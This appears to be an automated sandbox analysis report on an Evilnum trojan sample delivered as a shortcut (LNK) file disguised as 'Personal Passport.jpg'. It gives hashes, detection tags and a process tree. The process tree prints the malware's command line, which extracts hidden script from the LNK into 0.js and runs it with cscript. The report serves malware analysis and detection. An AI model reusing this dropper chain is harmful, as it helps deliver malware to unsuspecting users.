evilnum | e7510a4f5a90271f278970a8cb62d116b15ff08884c072ef44e419f896d65237

Analysis

Target

e7510a4f5a90271f278970a8cb62d116b15ff08884c072ef44e419f896d65237.lnk
Size

134KB
MD5

25d6eeba718af78275f2c9a4a58cd8b2
SHA1

97820a79fd43f664f553c46dca682bce135b2cc3
SHA256

e7510a4f5a90271f278970a8cb62d116b15ff08884c072ef44e419f896d65237
SHA512

6f213fb85e5f5f37e5f80e94625dfb04df2eb8682df9dffd2b045ac376a8fdd8a5d97f6f8eda8453fea2adbc1799ae0f9247ad09a2baac9d7c9654cdab4d770e

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1356 wrote to memory of 868	1356	cmd.exe	28
PID 1356 wrote to memory of 868	1356	cmd.exe	28
PID 1356 wrote to memory of 868	1356	cmd.exe	28
PID 868 wrote to memory of 956	868	cmd.exe	29
PID 868 wrote to memory of 956	868	cmd.exe	29
PID 868 wrote to memory of 956	868	cmd.exe	29
PID 868 wrote to memory of 1716	868	cmd.exe	30
PID 868 wrote to memory of 1716	868	cmd.exe	30
PID 868 wrote to memory of 1716	868	cmd.exe	30
PID 868 wrote to memory of 1780	868	cmd.exe	31
PID 868 wrote to memory of 1780	868	cmd.exe	31
PID 868 wrote to memory of 1780	868	cmd.exe	31
PID 868 wrote to memory of 1092	868	cmd.exe	32
PID 868 wrote to memory of 1092	868	cmd.exe	32
PID 868 wrote to memory of 1092	868	cmd.exe	32
PID 868 wrote to memory of 760	868	cmd.exe	33
PID 868 wrote to memory of 760	868	cmd.exe	33
PID 868 wrote to memory of 760	868	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\e7510a4f5a90271f278970a8cb62d116b15ff08884c072ef44e419f896d65237.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Personal Passport.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Pers*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:868
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Pers*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1716
- - C:\Windows\system32\find.exe
    find "RDE3"
    3⤵
    PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1092
- - C:\Windows\system32\cscript.exe
    cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:760

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1356-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp

Filesize
8KB

Download